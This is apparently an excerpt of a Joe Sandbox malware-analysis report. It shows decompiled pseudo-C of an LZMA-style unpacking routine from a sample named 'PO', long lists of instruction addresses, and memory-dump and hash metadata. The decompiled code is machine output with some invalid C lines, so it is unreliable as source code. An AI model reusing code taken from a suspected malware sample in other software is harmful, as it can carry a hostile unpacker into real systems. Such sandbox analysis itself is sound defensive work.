								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406b92
0x00406b92
0x00406b96
0x00406c4d
0x00406c50
0x00406c5c
0x00406b3d
0x00406b3d
0x00406b40
0x00406eb2
0x00406eb2
0x00406eb5
0x00406eb5
0x00406ebb
0x00406ec1
0x00406ec7
0x00406ee1
0x00406ee4
0x00406eea
0x00406ef5
0x00406ef7
0x00406ec9
0x00406ec9
0x00406ed8
0x00406edc
0x00406edc
0x00406f01
0x00406f28
0x00406f28
0x00406f2e
0x00406f2e
0x00000000
0x00406f03
0x00406f03
0x00406f07
0x004070b6
0x00000000
0x004070b6
0x00406f13
0x00406f1a
0x00406f22
0x00406f25
0x00000000
0x00406f25
0x00406b9c
0x00406ba0
0x004070e1
0x004070e1
0x004070e4
0x004070e8
0x004070e8
0x00406ba6
0x00406bac
0x00406baf
0x00406bb3
0x00406bb6
0x00406bba
0x00407080
0x004070cc
0x004070d4
0x004070db
0x004070dd
0x00000000
0x004070dd
0x00406bc0
0x00406bc3
0x00406bc9
0x00406bcb
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd4
0x00406bd7
0x00406bda
0x00406bdd
0x00406bde
0x00406be0
0x00406be0
0x00406be0
0x00406be3
0x00406be6
0x00406be9
0x00406bec
0x00406bec
0x00406bef
0x00406bf1
0x00406bf1
0x00406bf4
0x00406bf4
0x00406bf4
0x004066ca
0x004066ca
0x004066d3
0x00000000
0x00000000
0x004066d9
0x00000000
0x004066e4
0x00000000
0x00000000
0x004066ed
0x004066f0
0x004066f3
0x004066f7
0x00000000
0x00000000
0x004066fd
0x00406700
0x00406702
0x00406703
0x00406706
0x00406708
0x00406709
0x0040670b
0x0040670e
0x00406713
0x00406718
0x00406721
0x00406734
0x00406737
0x00406743
0x0040676b
0x0040676d
0x0040677b
0x0040677b
0x0040677f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040676f
0x0040676f
0x00406772
0x00406773
0x00406773
0x00000000
0x0040676f
0x00406749
0x0040674e
0x0040674e
0x00406757
0x0040675f
0x00406762
0x00000000
0x00406768
0x00406768
0x00000000
0x00406768
0x00000000
0x00406785
0x00406785
0x00406789
0x00407035
0x00000000
0x00407035
0x00406792
0x004067a2
0x004067a5
0x004067a8
0x004067a8
0x004067a8
0x004067ab
0x004067af
0x00000000
0x00000000
0x004067b1
0x004067b7
0x004067e1
0x004067e7
0x004067ee
0x00000000
0x004067ee
0x004067bd
0x004067c0
0x004067c5
0x004067c5
0x004067d0
0x004067d8
0x004067db
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406820
0x00406826
0x00406829
0x00406836
0x0040683e
0x00000000
0x00000000
0x004067f5
0x004067f5
0x004067f9
0x00407044
0x00000000
0x00407044
0x00406805
0x00406810
0x00406810
0x00406810
0x00406813
0x00406816
0x00406819
0x0040681e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406846
0x00406848
0x0040684b
0x004068bc
0x004068bf
0x004068c2
0x004068c9
0x004068d3
0x00000000
0x004068d3
0x0040684d
0x00406851
0x00406854
0x00406856
0x00406859
0x0040685c
0x0040685e
0x00406861
0x00406863
0x00406868
0x0040686b
0x0040686e
0x00406872
0x00406879
0x0040687c
0x00406883
0x00406887
0x0040688f
0x0040688f
0x0040688f
0x00406889
0x00406889
0x00406889
0x0040687e
0x0040687e
0x0040687e
0x00406893
0x00406896
0x004068b4
0x004068b6
0x00000000
0x00406898
0x00406898
0x0040689b
0x0040689e
0x004068a1
0x004068a3
0x004068a3
0x004068a3
0x004068a6
0x004068a9
0x004068ab
0x004068ac
0x004068af
0x00000000
0x004068af
0x00000000
0x00406ae5
0x00406ae9
0x00406b07
0x00406b0a
0x00406b11
0x00406b14
0x00406b17
0x00406b1a
0x00406b1d
0x00406b20
0x00406b22
0x00406b29
0x00406b2a
0x00406b2c
0x00406b2f
0x00406b32
0x00406b35
0x00406b35
0x00406b3a
0x00000000
0x00406b3a
0x00406aeb
0x00406aee
0x00406af1
0x00406afb
0x00000000
0x00000000
0x00406b4f
0x00406b53
0x00406b76
0x00406b79
0x00406b7c
0x00406b86
0x00406b55
0x00406b55
0x00406b58
0x00406b5b
0x00406b5e
0x00406b6b
0x00406b6e
0x00406b6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c03
0x00406c07
0x00406c0e
0x00406c11
0x00406c14
0x00406c1e
0x00000000
0x00406c1e
0x00406c09
0x00000000
0x00000000
0x00406c2a
0x00406c2e
0x00406c35
0x00406c38
0x00406c3b
0x00406c30
0x00406c30
0x00406c30
0x00406c3e
0x00406c41
0x00406c44
0x00406c44
0x00406c47
0x00406c4a
0x00000000
0x00000000
0x00406cea
0x00406cea
0x00406cee
0x0040708c
0x00000000
0x0040708c
0x00406cf4
0x00406cf7
0x00406cfa
0x00406cfe
0x00406d01
0x00406d07
0x00406d09
0x00406d09
0x00406d09
0x00406d0c
0x00406d0f
0x00000000
0x00000000
0x004068df
0x004068df
0x004068e3
0x00407050
0x00000000
0x00407050
0x004068e9
0x004068ec
0x004068ef
0x004068f3
0x004068f6
0x004068fc
0x004068fe
0x004068fe
0x004068fe
0x00406901
0x00406904
0x00406904
0x00406907
0x0040690a
0x00000000
0x00000000
0x00406910
0x00406916
0x00000000
0x00000000
0x0040691c
0x0040691c
0x00406920
0x00406923
0x00406926
0x00406929
0x0040692c
0x0040692d
0x00406930
0x00406932
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x0040694a
0x00406966
0x00406969
0x0040696c
0x0040696f
0x00406976
0x0040697a
0x0040697c
0x00406980
0x0040694c
0x0040694c
0x00406950
0x00406958
0x0040695d
0x0040695f
0x00406961
0x00406961
0x00406983
0x0040698a
0x0040698d
0x00000000
0x00406993
0x00000000
0x00406993
0x00000000
0x00406998
0x00406998
0x0040699c
0x0040705c
0x00000000
0x0040705c
0x004069a2
0x004069a5
0x004069a8
0x004069ac
0x004069af
0x004069b5
0x004069b7
0x004069b7
0x004069b7
0x004069ba
0x004069bd
0x004069bd
0x004069bd
0x004069c3
0x00000000
0x00000000
0x004069c5
0x004069c8
0x004069cb
0x004069ce
0x004069d1
0x004069d4
0x004069d7
0x004069da
0x004069dd
0x004069e0
0x004069e3
0x004069fb
0x004069fe
0x00406a01
0x00406a04
0x00406a04
0x00406a07
0x00406a0b
0x00406a0d
0x004069e5
0x004069e5
0x004069ed
0x004069f2
0x004069f4
0x004069f6
0x004069f6
0x00406a10
0x00406a17
0x00406a1a
0x00000000
0x00406a1c
0x00000000
0x00406a1c
0x00406a1a
0x00406a21
0x00406a21
0x00406a21
0x00406a21
0x00000000
0x00000000
0x00406a5c
0x00406a5c
0x00406a60
0x00407068
0x00000000
0x00407068
0x00406a66
0x00406a69
0x00406a6c
0x00406a70
0x00406a73
0x00406a79
0x00406a7b
0x00406a7b
0x00406a7b
0x00406a7e
0x00406a81
0x00406a81
0x00406a87
0x00406a25
0x00406a25
0x00406a28
0x00000000
0x00406a28
0x00406a89
0x00406a89
0x00406a8c
0x00406a8f
0x00406a92
0x00406a95
0x00406a98
0x00406a9b
0x00406a9e
0x00406aa1
0x00406aa4
0x00406aa7
0x00406abf
0x00406ac2
0x00406ac5
0x00406ac8
0x00406ac8
0x00406acb
0x00406acf
0x00406ad1
0x00406aa9
0x00406aa9
0x00406ab1
0x00406ab6
0x00406ab8
0x00406aba
0x00406aba
0x00406ad4
0x00406adb
0x00406ade
0x00000000
0x00406ae0
0x00000000
0x00406ae0
0x00000000
0x00406d6d
0x00406d6d
0x00406d71
0x00407098
0x00000000
0x00407098
0x00406d77
0x00406d7a
0x00406d7d
0x00406d81
0x00406d84
0x00406d8a
0x00406d8c
0x00406d8c
0x00406d8c
0x00406d8f
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e7c
0x00406e80
0x00406ea2
0x00406ea5
0x00406eaf
0x00000000
0x00406eaf
0x00406e82
0x00406e85
0x00406e89
0x00406e8c
0x00406e8c
0x00406e8f
0x00000000
0x00000000
0x00406f39
0x00406f3d
0x00406f5b
0x00406f5b
0x00406f5b
0x00406f62
0x00406f69
0x00406f70
0x00406f70
0x00000000
0x00406f70
0x00406f3f
0x00406f42
0x00406f45
0x00406f48
0x00406f4f
0x00406e93
0x00406e93
0x00406e96
0x00000000
0x00000000
0x0040702a
0x0040702d
0x00000000
0x00000000
0x00406c64
0x00406c66
0x00406c6d
0x00406c6e
0x00406c70
0x00406c73
0x00000000
0x00000000
0x00406c7b
0x00406c7e
0x00406c81
0x00406c83
0x00406c85
0x00406c85
0x00406c86
0x00406c89
0x00406c90
0x00406c93
0x00406ca1
0x00000000
0x00000000
0x00406f77
0x00406f77
0x00406f7a
0x00406f81
0x00000000
0x00000000
0x00406f86
0x00406f86
0x00406f8a
0x004070c2
0x00000000
0x004070c2
0x00406f90
0x00406f93
0x00406f96
0x00406f9a
0x00406f9d
0x00406fa3
0x00406fa5
0x00406fa5
0x00406fa5
0x00406fa8
0x00406fab
0x00406fab
0x00406fab
0x00406fab
0x00406fae
0x00406fae
0x00406fb2
0x00407012
0x00407015
0x0040701a
0x0040701b
0x0040701d
0x0040701f
0x00407022
0x00000000
0x00407022
0x00406fb4
0x00406fba
0x00406fbd
0x00406fc0
0x00406fc3
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fcf
0x00406fd2
0x00406fd5
0x00406fee
0x00406ff1
0x00406ff4
0x00406ff7
0x00406ffb
0x00406ffd
0x00406ffd
0x00406ffe
0x00407001
0x00406fd7
0x00406fd7
0x00406fdf
0x00406fe4
0x00406fe6
0x00406fe9
0x00406fe9
0x00407004
0x0040700b
0x00000000
0x0040700d
0x00000000
0x0040700d
0x00000000
0x00406ca9
0x00406cac
0x00406ce2
0x00406e12
0x00406e12
0x00406e12
0x00406e12
0x00406e15
0x00406e15
0x00406e18
0x00406e1a
0x004070a4
0x00000000
0x004070a4
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2d
0x00406e30
0x00406e30
0x00406e30
0x00000000
0x00406e30
0x00406cae
0x00406cb0
0x00406cb2
0x00406cb4
0x00406cb7
0x00406cb8
0x00406cba
0x00406cbc
0x00406cbf
0x00406cc2
0x00406cd8
0x00406cdd
0x00406d15
0x00406d15
0x00406d19
0x00406d45
0x00406d47
0x00406d4e
0x00406d51
0x00406d54
0x00406d54
0x00406d59
0x00406d59
0x00406d5b
0x00406d5e
0x00406d65
0x00406d68
0x00406d95
0x00406d95
0x00406d98
0x00406d9b
0x00406e0f
0x00406e0f
0x00406e0f
0x00000000
0x00406e0f
0x00406d9d
0x00406da3
0x00406da6
0x00406da9
0x00406dac
0x00406daf
0x00406db2
0x00406db5
0x00406db8
0x00406dbb
0x00406dbe
0x00406dd7
0x00406dd9
0x00406ddc
0x00406ddd
0x00406de0
0x00406de2
0x00406de5
0x00406de7
0x00406de9
0x00406dec
0x00406dee
0x00406df1
0x00406df5
0x00406df7
0x00406df7
0x00406df8
0x00406dfb
0x00406dfe
0x00406dc0
0x00406dc0
0x00406dc8
0x00406dcd
0x00406dcf
0x00406dd2
0x00406dd2
0x00406e01
0x00406e08
0x00406d92
0x00406d92
0x00406d92
0x00406d92
0x00000000
0x00406e0a
0x00000000
0x00406e0a
0x00406e08
0x00406d1b
0x00406d1e
0x00406d20
0x00406d23
0x00406d26
0x00406d29
0x00406d2b
0x00406d2e
0x00406d31
0x00406d31
0x00406d34
0x00406d34
0x00406d37
0x00406d3e
0x00406d12
0x00406d12
0x00406d12
0x00406d12
0x00000000
0x00406d40
0x00000000
0x00406d40
0x00406d3e
0x00406cc4
0x00406cc7
0x00406cc9
0x00406ccc
0x00000000
0x00000000
0x00406a2b
0x00406a2b
0x00406a2f
0x00407074
0x00000000
0x00407074
0x00406a35
0x00406a38
0x00406a3b
0x00406a3e
0x00406a41
0x00406a44
0x00406a47
0x00406a49
0x00406a4c
0x00406a4f
0x00406a52
0x00406a54
0x00406a54
0x00406a54
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e33
0x00406e33
0x00406e33
0x00406e37
0x00000000
0x00000000
0x00406e3d
0x00406e40
0x00406e43
0x00406e46
0x00406e48
0x00406e48
0x00406e48
0x00406e4b
0x00406e4e
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5b
0x00406e5d
0x00406e5d
0x00406e5d
0x00406e60
0x00406e63
0x00406e66
0x00406e69
0x00406e6c
0x00406e70
0x00406e72
0x00406e75
0x00000000
0x00406e77
0x00000000
0x00406e77
0x00406e75
0x004070aa
0x00000000
0x00000000
0x004066d9

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 683f34e5330f3119535e65c3fcc014917b66dea9351a733ad05ad489270f429c
Instruction ID: c728d5504c89e28601c55753f21d2f559f3974f1a6ce44cf054f885a45476dee
Opcode Fuzzy Hash: 683f34e5330f3119535e65c3fcc014917b66dea9351a733ad05ad489270f429c
Instruction Fuzzy Hash: 06813471D04228CFDF24CFA8C844BADBBB1FB44305F25816AD856BB291C7789A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406697 Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406697(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004070E9))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
